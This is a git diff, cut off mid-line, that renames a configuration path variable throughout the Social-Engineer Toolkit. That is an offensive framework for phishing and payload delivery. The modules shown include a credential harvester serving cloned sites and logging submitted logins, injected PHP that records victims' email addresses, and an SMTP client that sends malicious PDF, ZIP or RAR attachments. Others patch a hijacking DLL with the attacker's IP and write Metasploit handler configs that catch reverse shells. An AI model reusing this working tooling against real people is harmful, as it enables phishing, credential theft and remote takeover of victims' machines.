+ if os.path.isfile(userconfigpath + "uac.address"): + os.remove(userconfigpath + "uac.address") + filewrite = open(userconfigpath + "uac.address", "w") filewrite.write(addr) filewrite.close() @@ -1033,9 +1033,9 @@ Example: shellcode - Then paste your shellcode \x41\x41\etc if os.path.isfile("src/payloads/set_payloads/persistence.binary"): if core_modules == True: subprocess.Popen( - "cp src/payloads/set_payloads/persistence.binary %s" % (setdir), shell=True).wait() - upx("%s/persistence.binary" % (setdir)) - upload = "%s/persistence.binary" % (setdir) + "cp src/payloads/set_payloads/persistence.binary %s" % (userconfigpath), shell=True).wait() + upx("%s/persistence.binary" % (userconfigpath)) + upload = "%s/persistence.binary" % (userconfigpath) if core_modules == False: upload = "src/payloads/set_payloads/persistence.binary" @@ -1085,9 +1085,9 @@ Example: shellcode - Then paste your shellcode \x41\x41\etc if os.path.isfile("src/payloads/set_payloads/shell.windows"): if core_modules == True: subprocess.Popen( - "cp src/payloads/set_payloads/shell.windows %s" % (setdir), shell=True).wait() - upx(setdir + "/shell.windows") - upload = setdir + "/shell.windows" + "cp src/payloads/set_payloads/shell.windows %s" % (userconfigpath), shell=True).wait() + upx(userconfigpath + "shell.windows") + upload = userconfigpath + "shell.windows" if core_modules == False: upload = "src/payloads/set_payloads/shell.windows" @@ -1437,8 +1437,8 @@ Example: shellcode - Then paste your shellcode \x41\x41\etc # if we have a windows shell if data == "IHAYYYYYIAMSETANDIAMWINDOWS": - if os.path.isfile(setdir + "/system.address"): - fileopen = open(setdir + "/system.address", "r") + if os.path.isfile(userconfigpath + "system.address"): + fileopen = open(userconfigpath + "system.address", "r") system = fileopen.read().rstrip() system = system.replace(":WINDOWS", "") system = system.replace(":UAC-SAFE", "") @@ -1446,8 +1446,8 @@ Example: shellcode - Then paste your shellcode \x41\x41\etc temp_addr = str(addr[0] + ":WINDOWS:SYSTEM") bypass_counter = 1 - if os.path.isfile(setdir + "/uac.address"): - fileopen = open(setdir + "/uac.address", "r") + if os.path.isfile(userconfigpath + "uac.address"): + fileopen = open(userconfigpath + "uac.address", "r") uac = fileopen.read().rstrip() uac = uac.replace(":WINDOWS", "") if str(addr[0]) == str(uac): @@ -1479,12 +1479,12 @@ Example: shellcode - Then paste your shellcode \x41\x41\etc # reset value # if uac != None: - if os.path.isfile(setdir + "/uac.address"): - os.remove(setdir + "/uac.address") + if os.path.isfile(userconfigpath + "uac.address"): + os.remove(userconfigpath + "uac.address") bypass_counter = 0 - if os.path.isfile(setdir + "/system.address"): - os.remove(setdir + "/system.address") + if os.path.isfile(userconfigpath + "system.address"): + os.remove(userconfigpath + "system.address") bypass_counter = 0 if addr[0] != "127.0.0.1": diff --git a/src/phishing/smtp/client/smtp_client.py b/src/phishing/smtp/client/smtp_client.py index 8d2265180..e2210c4be 100644 --- a/src/phishing/smtp/client/smtp_client.py +++ b/src/phishing/smtp/client/smtp_client.py @@ -109,41 +109,41 @@ print_info( "As an added bonus, use the file-format creator in SET to create your attachment.") counter = 0 # PDF Previous -if os.path.isfile(setdir + "/template.pdf"): - if os.path.isfile(setdir + "/template.rar"): - if os.path.isfile(setdir + "/template.zip"): +if os.path.isfile(userconfigpath + "template.pdf"): + if os.path.isfile(userconfigpath + "template.rar"): + if os.path.isfile(userconfigpath + "template.zip"): print_warning("Multiple payloads were detected:") print ("1. PDF Payload\n2. VBS Payload\n3. Zipfile Payload\n\n") choose_payload = input(setprompt("0", "")) if choose_payload == '1': - file_format = (setdir + "/template.pdf") + file_format = (userconfigpath + "template.pdf") if choose_payload == '2': - file_format = (setdir + "/template.rar") + file_format = (userconfigpath + "template.rar") if choose_payload == '3': - file_format = (setdir + "/template.zip") + file_format = (userconfigpath + "template.zip") counter = 1 if counter == 0: - if os.path.isfile(setdir + "/template.pdf"): - file_format = (setdir + "/template.pdf") - if os.path.isfile(setdir + "/template.rar"): - file_format = (setdir + "/template.rar") - if os.path.isfile(setdir + "/template.zip"): - file_format = (setdir + "/template.zip") - if os.path.isfile(setdir + "/template.doc"): - file_format = (setdir + "/template.doc") - if os.path.isfile(setdir + "/template.rtf"): - file_format = (setdir + "/template.rtf") - if os.path.isfile(setdir + "/template.mov"): - file_format = (setdir + "/template.mov") + if os.path.isfile(userconfigpath + "template.pdf"): + file_format = (userconfigpath + "template.pdf") + if os.path.isfile(userconfigpath + "template.rar"): + file_format = (userconfigpath + "template.rar") + if os.path.isfile(userconfigpath + "template.zip"): + file_format = (userconfigpath + "template.zip") + if os.path.isfile(userconfigpath + "template.doc"): + file_format = (userconfigpath + "template.doc") + if os.path.isfile(userconfigpath + "template.rtf"): + file_format = (userconfigpath + "template.rtf") + if os.path.isfile(userconfigpath + "template.mov"): + file_format = (userconfigpath + "template.mov") # Determine if prior payload created -if not os.path.isfile(setdir + "/template.pdf"): - if not os.path.isfile(setdir + "/template.rar"): - if not os.path.isfile(setdir + "/template.zip"): - if not os.path.isfile(setdir + "/template.doc"): - if not os.path.isfile(setdir + "/template.rtf"): - if not os.path.isfile(setdir + "/template.mov"): +if not os.path.isfile(userconfigpath + "template.pdf"): + if not os.path.isfile(userconfigpath + "template.rar"): + if not os.path.isfile(userconfigpath + "template.zip"): + if not os.path.isfile(userconfigpath + "template.doc"): + if not os.path.isfile(userconfigpath + "template.rtf"): + if not os.path.isfile(userconfigpath + "template.mov"): print("No previous payload created.") file_format = input( setprompt(["1"], "Enter the file to use as an attachment")) @@ -175,8 +175,8 @@ if filename1 == '1' or filename1 == '': if filename1 == '2': filename1 = input(setprompt(["1"], "New filename")) subprocess.Popen("cp %s %s/%s 1> /dev/null 2> /dev/null" % - (file_format, setdir, filename1), shell=True).wait() - file_format = ("%s/%s" % (setdir, filename1)) + (file_format, userconfigpath, filename1), shell=True).wait() + file_format = ("%s/%s" % (userconfigpath, filename1)) print_status("Filename changed, moving on...") print (""" @@ -210,7 +210,7 @@ if option1 == '1' or option1 == '2': if template_choice == '1': # set path for path = 'src/templates/' - filewrite = open(setdir + "/email.templates", "w") + filewrite = open(userconfigpath + "email.templates", "w") counter = 0 # Pull all files in the templates directory for infile in glob.glob(os.path.join(path, '*.template')): @@ -223,7 +223,7 @@ if option1 == '1' or option1 == '2': # close the file filewrite.close() # read in formatted filenames - fileread = open(setdir + "/email.templates", "r").readlines() + fileread = open(userconfigpath + "email.templates", "r").readlines() print_info("Available templates:") for line in fileread: line = line.rstrip() @@ -459,31 +459,31 @@ if option1 == '2': email_num = email_num + 1 print(" Sent e-mail number: " + (str(email_num))) -if not os.path.isfile(setdir + "/template.zip"): +if not os.path.isfile(userconfigpath + "template.zip"): print_status("SET has finished delivering the emails") question1 = yesno_prompt(["1"], "Setup a listener [yes|no]") if question1 == 'YES': - if not os.path.isfile(setdir + "/payload.options"): - if not os.path.isfile(setdir + "/meta_config"): - if not os.path.isfile(setdir + "/unc_config"): + if not os.path.isfile(userconfigpath + "payload.options"): + if not os.path.isfile(userconfigpath + "meta_config"): + if not os.path.isfile(userconfigpath + "unc_config"): print_error( "Sorry, you did not generate your payload through SET, this option is not supported.") - if os.path.isfile(setdir + "/unc_config"): + if os.path.isfile(userconfigpath + "unc_config"): child = pexpect.spawn( - "%smsfconsole -r %s/unc_config" % (meta_path, setdir)) + "%smsfconsole -r %s/unc_config" % (meta_path, userconfigpath)) try: child.interact() except Exception: child.close() - if os.path.isfile(setdir + "/payload.options"): - fileopen = open(setdir + "/payload.options", "r").readlines() + if os.path.isfile(userconfigpath + "payload.options"): + fileopen = open(userconfigpath + "payload.options", "r").readlines() for line in fileopen: line = line.rstrip() line = line.split(" ") # CREATE THE LISTENER HERE - filewrite = open(setdir + "/meta_config", "w") + filewrite = open(userconfigpath + "meta_config", "w") filewrite.write("use exploit/multi/handler\n") filewrite.write("set PAYLOAD " + line[0] + "\n") filewrite.write("set LHOST " + line[1] + "\n") @@ -493,7 +493,7 @@ if not os.path.isfile(setdir + "/template.zip"): filewrite.write("exploit -j\r\n\r\n") filewrite.close() child = pexpect.spawn( - "%smsfconsole -r %s/meta_config" % (meta_path, setdir)) + "%smsfconsole -r %s/meta_config" % (meta_path, userconfigpath)) try: child.interact() except Exception: diff --git a/src/teensy/binary2teensy.py b/src/teensy/binary2teensy.py index 54151d081..46ceeb463 100644 --- a/src/teensy/binary2teensy.py +++ b/src/teensy/binary2teensy.py @@ -308,24 +308,24 @@ Keyboard.send_now(); }""" % (random_filename,random_filename,powershell_command,vbs,bat,vbs,vbs,random_filename,alpha_payload,bat,vbs)) # delete temporary file subprocess.Popen("rm %s 1> /dev/null 2>/dev/null" % (random_filename), shell=True).wait() -if not os.path.isdir(setdir + "reports"): os.makedirs(setdir + "reports") -print_status("Binary to Teensy file exported as %sreports/binary2teensy" % (setdir)) +if not os.path.isdir(userconfigpath + "reports"): os.makedirs(userconfigpath + "reports") +print_status("Binary to Teensy file exported as %sreports/binary2teensy" % (userconfigpath)) # write the teensy.ino file out -filewrite = file(setdir + "reports/binary2teensy.ino", "w") +filewrite = file(userconfigpath + "reports/binary2teensy.ino", "w") # write the teensy.ino file out filewrite.write(output_variable) # close the file filewrite.close() print_status("Generating a listener...") # create our metasploit answer file -filewrite = file(setdir + "answer.txt", "w") +filewrite = file(userconfigpath + "answer.txt", "w") filewrite.write("use multi/handler\nset payload %s\nset LHOST %s\nset LPORT %s\n%s\nexploit -j" % (payload,ipaddr,port,url)) filewrite.close() # spawn a multi/handler listener -subprocess.Popen("msfconsole -r %sanswer.txt" % (setdir), shell=True).wait() +subprocess.Popen("msfconsole -r %sanswer.txt" % (userconfigpath), shell=True).wait() print_status("[*] Housekeeping old files...") # if our answer file is still there (which it should be), then remove it -if os.path.isfile(setdir + "answer.txt"): +if os.path.isfile(userconfigpath + "answer.txt"): # remove the old file, no longer used once we've exited - subprocess.Popen("rm " + setdir + "answer.txt", shell=True).wait() + subprocess.Popen("rm " + userconfigpath + "answer.txt", shell=True).wait() diff --git a/src/teensy/teensy.py b/src/teensy/teensy.py index 410865e9e..692654783 100644 --- a/src/teensy/teensy.py +++ b/src/teensy/teensy.py @@ -29,7 +29,7 @@ now = datetime.datetime.today() if operating_system != "windows": import pexpect -# check to see if setdir is created +# check to see if userconfigpath is created if not os.path.isdir(os.path.join(core.userconfigpath, "reports")): os.makedirs(os.path.join(core.userconfigpath, "reports")) @@ -84,7 +84,7 @@ with open(os.path.join(core.userconfigpath, "teensy")) as fileopen: def writefile(filename, now): with open(os.path.join("src/teensy/" + filename)) as fileopen, \ - open(os.path.join(core.userconfigpath, "/reports/teensy_{0}.ino".format(now)), "w") as filewrite: + open(os.path.join(core.userconfigpath, "reports/teensy_{0}.ino".format(now)), "w") as filewrite: for line in fileopen: match = re.search("IPADDR", line) diff --git a/src/webattack/browser_exploits/gen_payload.py b/src/webattack/browser_exploits/gen_payload.py index 8d97d3d0f..77630efa0 100644 --- a/src/webattack/browser_exploits/gen_payload.py +++ b/src/webattack/browser_exploits/gen_payload.py @@ -13,15 +13,15 @@ port = "" # see if multi_attack is being used and prep everything we need multiattack = "off" webdav_enabled = "off" -if os.path.isfile(setdir + "/multi_payload"): +if os.path.isfile(userconfigpath + "multi_payload"): multiattack = "on" # just need a simple filewrite to generate a file if webdav is enabled # this is used for multi attack, it will write out file to program junk # then a simple check will determine if webdav is enabled for the port webdav_enabled = "off" - webdav_write = open(setdir + "/webdav_enabled", "w") + webdav_write = open(userconfigpath + "webdav_enabled", "w") - fileopen = open(setdir + "/multi_payload", "r") + fileopen = open(userconfigpath + "multi_payload", "r") for line in fileopen: match = re.search("MAIN=", line) if match: @@ -60,8 +60,8 @@ for line in configfile: # grab attack vector attack_vector = "" -if os.path.isfile(setdir + "/attack_vector"): - fileopen = open(setdir + "/attack_vector") +if os.path.isfile(userconfigpath + "attack_vector"): + fileopen = open(userconfigpath + "attack_vector") for line in fileopen: attack_vector = line.rstrip() @@ -107,10 +107,10 @@ if multiattack == "off": port = "443" # check to see if we need to use the multi attack vector in java -if not os.path.isfile(setdir + "/multi_java"): - filewrite = open(setdir + "/meta_config", "w") -if os.path.isfile(setdir + "/multi_java"): - filewrite = open(setdir + "/meta_config", "a") +if not os.path.isfile(userconfigpath + "multi_java"): + filewrite = open(userconfigpath + "meta_config", "w") +if os.path.isfile(userconfigpath + "multi_java"): + filewrite = open(userconfigpath + "meta_config", "a") filewrite.write("use " + exploit + "\n") filewrite.write("set PAYLOAD " + choice1 + "\n") @@ -160,10 +160,10 @@ filewrite.write("set ExitOnSession false\n") # if we are using multiple meterpreter multiscripts if meterpreter_multi == "ON": - multiwrite = open(setdir + "/multi_meter.file", "w") + multiwrite = open(userconfigpath + "multi_meter.file", "w") multiwrite.write(meterpreter_multi_command) filewrite.write( - "set InitialAutorunScript multiscript -rc %s/multi_meter.file\n" % (setdir)) + "set InitialAutorunScript multiscript -rc %s/multi_meter.file\n" % (userconfigpath)) multiwrite.close() # auto migration @@ -180,6 +180,6 @@ if webdav_enabled == "on": # this basically sets a flag we need to make some custom changes in web_server.py to get # the docbase exploit to work properly if exploit == ("windows/browser/java_docbase_bof"): - filewrite = open(setdir + "/docbase.file", "w") + filewrite = open(userconfigpath + "docbase.file", "w") filewrite.write("DOCBASE=ON") filewrite.close() diff --git a/src/webattack/dll_hijacking/hijacking.py b/src/webattack/dll_hijacking/hijacking.py index a906e7d1e..89e7b9f2d 100644 --- a/src/webattack/dll_hijacking/hijacking.py +++ b/src/webattack/dll_hijacking/hijacking.py @@ -60,7 +60,7 @@ for line in fileopen: print("\n [*] You have selected the file extension of %s and vulnerable dll of %s" % (extension, dll)) # prep the directories -subprocess.Popen("mkdir " + setdir + "/dll", stdout=subprocess.PIPE, +subprocess.Popen("mkdir " + userconfigpath + "dll", stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait() filename1 = input(setprompt( ["2", "15"], "Enter the filename for the attack (example:openthis) [openthis]")) @@ -68,7 +68,7 @@ if filename1 == "": filename1 = "openthis" # move the files there using the correct extension and file type -filewrite = open(setdir + "/dll/%s%s" % (filename1, extension), "w") +filewrite = open(userconfigpath + "dll/%s%s" % (filename1, extension), "w") filewrite.write("EMPTY") filewrite.close() @@ -82,7 +82,7 @@ else: fileopen = open("src/webattack/dll_hijacking/hijacking.dll", "rb") data = fileopen.read() -filewrite = open(setdir + "/dll/%s" % (dll), "wb") +filewrite = open(userconfigpath + "dll/%s" % (dll), "wb") host = int(len(ipaddr) + 1) * "X" @@ -127,7 +127,7 @@ if choice == "1": # we get a hit? if match: subprocess.Popen("cd %s/dll;rar a %s/template.rar * 1> /dev/null 2> /dev/null" % - (setdir, setdir), shell=True).wait() + (userconfigpath, userconfigpath), shell=True).wait() counter = 1 # if we didnt find rar @@ -139,11 +139,11 @@ if choice == "1": # if its a zipfile zip the badboy up if choice == "2": # write to a zipfile here - file = zipfile.ZipFile(setdir + "/template.zip", "w") - for name in glob.glob(setdir + "/dll/*"): + file = zipfile.ZipFile(userconfigpath + "template.zip", "w") + for name in glob.glob(userconfigpath + "dll/*"): file.write(name, os.path.basename(name), zipfile.ZIP_DEFLATED) file.close() -if os.path.isfile(setdir + "/msf.exe"): +if os.path.isfile(userconfigpath + "msf.exe"): subprocess.Popen("cp %s/msf.exe %s/src/html/" % - (setdir, definepath), shell=True).wait() + (userconfigpath, definepath), shell=True).wait() diff --git a/src/webattack/harvester/harvester.py b/src/webattack/harvester/harvester.py index ec55d620d..8e9b65e24 100644 --- a/src/webattack/harvester/harvester.py +++ b/src/webattack/harvester/harvester.py @@ -75,7 +75,7 @@ except Exception as err: attack_vector = "" -fileopen = open(setdir + "/attack_vector", "r") +fileopen = open(userconfigpath + "attack_vector", "r") for line in fileopen: line = line.rstrip() if line == 'multiattack': @@ -111,7 +111,7 @@ for line in fileopen: if match2: command_center = "on" command_center_write = open( - setdir + "/cc_harvester_hit" % (setdir), "w") + userconfigpath + "cc_harvester_hit" % (userconfigpath), "w") # if nada default port 80 if counter == 0: @@ -119,7 +119,7 @@ if counter == 0: # pull URL field counter = 0 -fileopen = open(setdir + "/site.template", "r").readlines() +fileopen = open(userconfigpath + "site.template", "r").readlines() for line in fileopen: line = line.rstrip() match = re.search("URL=", line) @@ -166,10 +166,10 @@ for line in fileopen: sys.path.append("src/core/ssl") # import our ssl module import setssl - subprocess.Popen("cp %s/CA/*.pem %s" % (setdir, setdir), + subprocess.Popen("cp %s/CA/*.pem %s" % (userconfigpath, userconfigpath), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait() # remove old junk we dont need anymore - subprocess.Popen("rm -rf %s/CA;cp *.pem %s" % (setdir, setdir), + subprocess.Popen("rm -rf %s/CA;cp *.pem %s" % (userconfigpath, userconfigpath), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait() # if user wants to specify his/her own PEM certificate @@ -184,7 +184,7 @@ for line in fileopen: print("\nUnable to find PEM file, check location and config again.") exit_set() if os.path.isfile(pem_client): - subprocess.Popen("cp %s %s/newcert.pem" % (pem_client, setdir), + subprocess.Popen("cp %s %s/newcert.pem" % (pem_client, userconfigpath), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait() match2 = re.search("PEM_SERVER=", line) if match2: @@ -193,7 +193,7 @@ for line in fileopen: print("\nUnable to find PEM file, check location and config again.") exit_set() if os.path.isfile(pem_server): - subprocess.Popen("cp %s %s/newreq.pem" % (pem_server, setdir), + subprocess.Popen("cp %s %s/newreq.pem" % (pem_server, userconfigpath), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait() # url decode for postbacks @@ -211,8 +211,8 @@ def urldecode(url): # here is where we specify how many people actually visited versus fell for it -visits = open(setdir + "/visits.file", "a") -bites = open(setdir + "/bites.file", "a") +visits = open(userconfigpath + "visits.file", "a") +bites = open(userconfigpath + "bites.file", "a") # SET Handler for handling POST requests and general setup through SSL @@ -247,7 +247,7 @@ class SETHandler(BaseHTTPRequestHandler): #print('-' * 40) pass - webroot = os.path.abspath(os.path.join(setdir, 'web_clone')) + webroot = os.path.abspath(os.path.join(userconfigpath, 'web_clone')) requested_file = os.path.abspath(os.path.join(webroot, self.path)) # try block setup to catch transmission errors try: @@ -256,7 +256,7 @@ class SETHandler(BaseHTTPRequestHandler): self.send_response(200) self.send_header('Content_type', 'text/html') self.end_headers() - fileopen = open(setdir + "/web_clone/index.html", "r") + fileopen = open(userconfigpath + "web_clone/index.html", "r") for line in fileopen: self.wfile.write(line) # write out that we had a visit @@ -268,7 +268,7 @@ class SETHandler(BaseHTTPRequestHandler): self.send_response(200) self.send_header('Content_type', 'text/html') self.end_headers() - fileopen = open(setdir + "/web_clone/index2.html", "r") + fileopen = open(userconfigpath + "web_clone/index2.html", "r") for line in fileopen: self.wfile.write(line) # write out that we had a visit @@ -310,7 +310,7 @@ class SETHandler(BaseHTTPRequestHandler): # change path to root for append on file os.chdir(homepath) # put the params into site.template for later user - filewrite = open(setdir + "/site.template", "a") + filewrite = open(userconfigpath + "site.template", "a") filewrite.write("\n") if not os.path.isfile("%s/src/logs/harvester.log" % (os.getcwd())): filewrite3 = open("%s/src/logs/harvester.log" % os.getcwd(), "w") @@ -356,7 +356,7 @@ class SETHandler(BaseHTTPRequestHandler): # pull URL field counter = 0 - fileopen = open(setdir + "/site.template", "r").readlines() + fileopen = open(userconfigpath + "site.template", "r").readlines() for line in fileopen: line = line.rstrip() match = re.search("URL=", line) @@ -380,7 +380,7 @@ class SETHandler(BaseHTTPRequestHandler): '' % (RAW_URL)) # set it back to our homepage - os.chdir(setdir + "/web_clone/") + os.chdir(userconfigpath + "web_clone/") class ThreadedHTTPServer(ThreadingMixIn, HTTPServer): @@ -526,37 +526,37 @@ def run(): (logpath, harvester_file), shell=True).wait() # if we are using webjacking, etc. - if os.path.isfile(setdir + "/web_clone/index2.html"): + if os.path.isfile(userconfigpath + "web_clone/index2.html"): # need to copy the files over - remove the old one first if there if os.path.isfile(apache_dir + "/index2.html"): os.remove(apache_dir + "/index2.html") - shutil.copyfile(setdir + "/web_clone/index2.html", + shutil.copyfile(userconfigpath + "web_clone/index2.html", apache_dir + "/index2.html") # here we specify if we are tracking users and such if track_email == True: - fileopen = open(setdir + "/web_clone/index.html", "r") + fileopen = open(userconfigpath + "web_clone/index.html", "r") data = fileopen.read() data = data.replace( "", """ $value) { $queryString .= $key . '=' . $value . '&';}$query_string = base64_decode($queryString);file_put_contents($file, print_r("Email address recorded: " . $query_string . "\\n", true), FILE_APPEND);?>""" % (harvester_file)) - filewrite = open(setdir + "/web_clone/index.2", "w") + filewrite = open(userconfigpath + "web_clone/index.2", "w") filewrite.write(data) filewrite.close() - os.remove(setdir + "/web_clone/index.html") - shutil.copyfile(setdir + "/web_clone/index.2", - setdir + "/web_clone/index.html") + os.remove(userconfigpath + "web_clone/index.html") + shutil.copyfile(userconfigpath + "web_clone/index.2", + userconfigpath + "web_clone/index.html") # copy the entire web_clone directory. # Without this only index.php|html are copied even though the user # may have chosen to import the entire directory in the set module. - copyfolder(setdir + "/web_clone", apache_dir) + copyfolder(userconfigpath + "web_clone", apache_dir) if os.path.isfile("%s/index.html" % (apache_dir)): os.remove("%s/index.html" % (apache_dir)) if track_email == False: - shutil.copyfile(setdir + "/web_clone/index.html", + shutil.copyfile(userconfigpath + "web_clone/index.html", "%s/index.html" % (apache_dir)) if track_email == True: - shutil.copyfile(setdir + "/web_clone/index.html", + shutil.copyfile(userconfigpath + "web_clone/index.html", "%s/index.php" % (apache_dir)) print_status( "NOTE: The URL to click on is index.php NOT index.html with track emails.") @@ -615,7 +615,7 @@ if webattack_email == True: module_reload(src.phishing.smtp.client.smtp_web) # see if we're tabnabbing or multiattack -fileopen = open(setdir + "/attack_vector", "r") +fileopen = open(userconfigpath + "attack_vector", "r") for line in fileopen: line = line.rstrip() if line == 'tabnabbing': @@ -628,12 +628,12 @@ for line in fileopen: if ssl_flag == 'true': web_port = "443" # check for PEM files here - if not os.path.isfile(setdir + "/newreq.pem"): + if not os.path.isfile(userconfigpath + "newreq.pem"): print("PEM files not detected. SSL will not work properly.") - if not os.path.isfile(setdir + "/newcert.pem"): + if not os.path.isfile(userconfigpath + "newcert.pem"): print("PEM files not detected. SSL will not work properly.") # copy over our PEM files - subprocess.Popen("cp %s/*.pem %s/web_clone/" % (setdir, setdir), + subprocess.Popen("cp %s/*.pem %s/web_clone/" % (userconfigpath, userconfigpath), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait() # copy patched socket over to web clone definepath = os.getcwd() @@ -643,7 +643,7 @@ if ssl_flag == 'true': # head over to cloned dir if apache_check == False: - os.chdir(setdir + "/web_clone/") + os.chdir(userconfigpath + "web_clone/") if attack_vector != "multiattack": if apache_check == False: diff --git a/src/webattack/harvester/report_generator.py b/src/webattack/harvester/report_generator.py index f29ef9b82..db40ad94b 100644 --- a/src/webattack/harvester/report_generator.py +++ b/src/webattack/harvester/report_generator.py @@ -7,8 +7,8 @@ import datetime from src.core.setcore import * # make sure the reports directory is created -if not os.path.isdir(setdir + "/reports/"): - os.makedirs(setdir + "/reports/") +if not os.path.isdir(userconfigpath + "reports/"): + os.makedirs(userconfigpath + "reports/") # # Quick report generation script @@ -33,20 +33,20 @@ definepath = os.getcwd() # grab URL and report information now = datetime.datetime.today() -fileopen = open(setdir + "/site.template", "r") -site_template = open(setdir + "/site.template", "r").readlines() +fileopen = open(userconfigpath + "site.template", "r") +site_template = open(userconfigpath + "site.template", "r").readlines() fileopen1 = open("%s/src/core/reports/index.html" % (definepath), "r") for line in fileopen: match = re.search("URL=", line) if match: url = line.replace("URL=http://", "") url = line.replace("URL=https://", "") - filewrite2 = open(setdir + "/reports/%s.xml" % (now), "a") + filewrite2 = open(userconfigpath + "reports/%s.xml" % (now), "a") filewrite2.write(r"""""" + "\n") filewrite2.write(r"" + "\n") for line2 in fileopen1: counter = 0 - filewrite = open(setdir + "/reports/%s.html" % (now), "a") + filewrite = open(userconfigpath + "reports/%s.html" % (now), "a") match1 = re.search("REPLACEHEREDUDE", line2) if match1: line2 = line2.replace("REPLACEHEREDUDE", url) @@ -83,8 +83,8 @@ for line in fileopen: # look for how many people visited the website match5 = re.search("VISITORSHERE", line2) if match5: - if os.path.isfile(setdir + "/visits.file"): - fileopen3 = open(setdir + "/visits.file", "r") + if os.path.isfile(userconfigpath + "visits.file"): + fileopen3 = open(userconfigpath + "visits.file", "r") counter5 = 0 for line in fileopen3: if line != "": @@ -92,7 +92,7 @@ for line in fileopen: counter5 = counter5 + 1 if line == "": counter5 = 0 - if not os.path.isfile(setdir + "/visits.file"): + if not os.path.isfile(userconfigpath + "visits.file"): counter5 = 0 line2 = line2.replace("VISITORSHERE", str(counter5), 2) @@ -101,13 +101,13 @@ for line in fileopen: match6 = re.search("BITESHERE", line2) if match6: - if os.path.isfile(setdir + "/bites.file"): - fileopen4 = open(setdir + "/bites.file", "r") + if os.path.isfile(userconfigpath + "bites.file"): + fileopen4 = open(userconfigpath + "bites.file", "r") counter5 = 0 for line in fileopen4: line = line.rstrip() counter5 = counter5 + 1 - if not os.path.isfile(setdir + "/bites.file"): + if not os.path.isfile(userconfigpath + "bites.file"): counter5 = 0 line2 = line2.replace("BITESHERE", str(counter5)) @@ -125,6 +125,6 @@ except: pass subprocess.Popen("cp -rf %s/src/core/reports/files %s/reports/" % (definepath, - setdir), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait() -print(bcolors.BLUE + "[*] File exported to %s/reports/%s.html for your reading pleasure..." % (setdir, now) + bcolors.ENDC) -print(bcolors.BLUE + "[*] File in XML format exported to %s/reports/%s.xml for your reading pleasure..." % (setdir, now) + bcolors.ENDC) + userconfigpath), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait() +print(bcolors.BLUE + "[*] File exported to %s/reports/%s.html for your reading pleasure..." % (userconfigpath, now) + bcolors.ENDC) +print(bcolors.BLUE + "[*] File in XML format exported to %s/reports/%s.xml for your reading pleasure..." % (userconfigpath, now) + bcolors.ENDC) diff --git a/src/webattack/harvester/scraper.py b/src/webattack/harvester/scraper.py index 096cb8b23..29c350331 100644 --- a/src/webattack/harvester/scraper.py +++ b/src/webattack/harvester/scraper.py @@ -24,13 +24,13 @@ else: # set the multiattack tabnabbing/webjacking flag multi_tabnabbing = "off" multi_webjacking = "off" -if os.path.isfile(setdir + "/multi_tabnabbing"): +if os.path.isfile(userconfigpath + "multi_tabnabbing"): multi_tabnabbing = "on" -if os.path.isfile(setdir + "/multi_webjacking"): +if os.path.isfile(userconfigpath + "multi_webjacking"): multi_webjacking = "on" # see if we're tabnabbing -fileopen = open(setdir + "/attack_vector", "r") +fileopen = open(userconfigpath + "attack_vector", "r") for line in fileopen: line = line.rstrip() if line == 'tabnabbing' or multi_tabnabbing == "on" or line == 'webjacking' or multi_webjacking == "on": @@ -59,8 +59,8 @@ if apache_mode == "on": apache_rewrite = "post.php" # start the scraping process -fileopen = open(setdir + "/web_clone/%s" % (site), "r").readlines() -filewrite = open(setdir + "/web_clone/index.html.new", "w") +fileopen = open(userconfigpath + "web_clone/%s" % (site), "r").readlines() +filewrite = open(userconfigpath + "web_clone/index.html.new", "w") for line in fileopen: # specify if it found post params @@ -102,9 +102,9 @@ for line in fileopen: # close the file filewrite.close() # move our newly created website with our post stuff to our cloned area -if os.path.isfile(setdir + "/web_clone/index.html.new"): - shutil.copyfile(setdir + "/web_clone/index.html.new", setdir + "/" + site) - if os.path.isfile(setdir + "/web_clone/" + site): - os.remove(setdir + "/web_clone/" + site) - shutil.move(setdir + "/web_clone/index.html.new", - setdir + "/web_clone/%s" % (site)) +if os.path.isfile(userconfigpath + "web_clone/index.html.new"): + shutil.copyfile(userconfigpath + "web_clone/index.html.new", userconfigpath + "" + site) + if os.path.isfile(userconfigpath + "web_clone/" + site): + os.remove(userconfigpath + "web_clone/" + site) + shutil.move(userconfigpath + "web_clone/index.html.new", + userconfigpath + "web_clone/%s" % (site)) diff --git a/src/webattack/hta/main.py b/src/webattack/hta/main.py index 56ba49a61..6691874c2 100644 --- a/src/webattack/hta/main.py +++ b/src/webattack/hta/main.py @@ -56,16 +56,16 @@ def gen_hta_cool_stuff(): html_code = ("""\n""" % url) # metasploit answer file here - filewrite = open(setdir + "/meta_config", "w") + filewrite = open(userconfigpath + "meta_config", "w") filewrite.write("use multi/handler\nset payload %s\nset LHOST %s\nset LPORT %s\nset ExitOnSession false\nset EnableStageEncoding true\nexploit -j\n\n" % (selection, ipaddr, port)) filewrite.close() # write out main1 and main2 - filewrite = open(setdir + "/hta_index", "w") + filewrite = open(userconfigpath + "hta_index", "w") filewrite.write(html_code) filewrite.close() # write out launcher.hta - filewrite = open(setdir + "/Launcher.hta", "w") + filewrite = open(userconfigpath + "Launcher.hta", "w") filewrite.write(main1 + main2 + main3 + main4) filewrite.close() diff --git a/src/webattack/multi_attack/multiattack.py b/src/webattack/multi_attack/multiattack.py index 1fb6a51b6..52d57df9c 100644 --- a/src/webattack/multi_attack/multiattack.py +++ b/src/webattack/multi_attack/multiattack.py @@ -51,12 +51,12 @@ def flag_off(vector): def write_file(filename, results): - filewrite = open(setdir + "/%s" % (filename), "w") + filewrite = open(userconfigpath + "%s" % (filename), "w") filewrite.write(results) filewrite.close() # specify attackvector -filewrite = open(setdir + "/attack_vector", "w") +filewrite = open(userconfigpath + "attack_vector", "w") filewrite.write("multiattack") filewrite.close() @@ -79,14 +79,14 @@ webdav_enable = "OFF" # see if we are running a custom cloned website clonedurl = 0 -fileopen = open(setdir + "/site.template", "r") +fileopen = open(userconfigpath + "site.template", "r") data = fileopen.read() if "TEMPLATE=SELF" in data: clonedurl = 1 # clean up cloner directory if clonedurl == 0: - subprocess.Popen("rm -rf %s/web_clone;mkdir %s/web_clone/" % (setdir, setdir), + subprocess.Popen("rm -rf 